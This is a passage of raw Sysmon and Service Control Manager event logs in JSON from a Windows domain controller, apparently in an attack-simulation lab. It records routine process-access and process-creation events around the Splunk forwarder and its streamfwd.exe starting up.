07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF8-5F25-0000-001073A70500}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF8-5F25-0000-001073A70500}","TargetProcessId":"4292","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF8-5F25-0000-001073A70500}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF8-5F25-0000-001073A70500}","TargetProcessId":"4292","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76855,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The SplunkForwarder Service service entered the running state.","param1":"SplunkForwarder Service","param2":"running","EventReceivedTime":"2020-08-01 07:55:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.254\r\nProcessGuid: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nProcessId: 3916\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.254","ProcessGuid":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 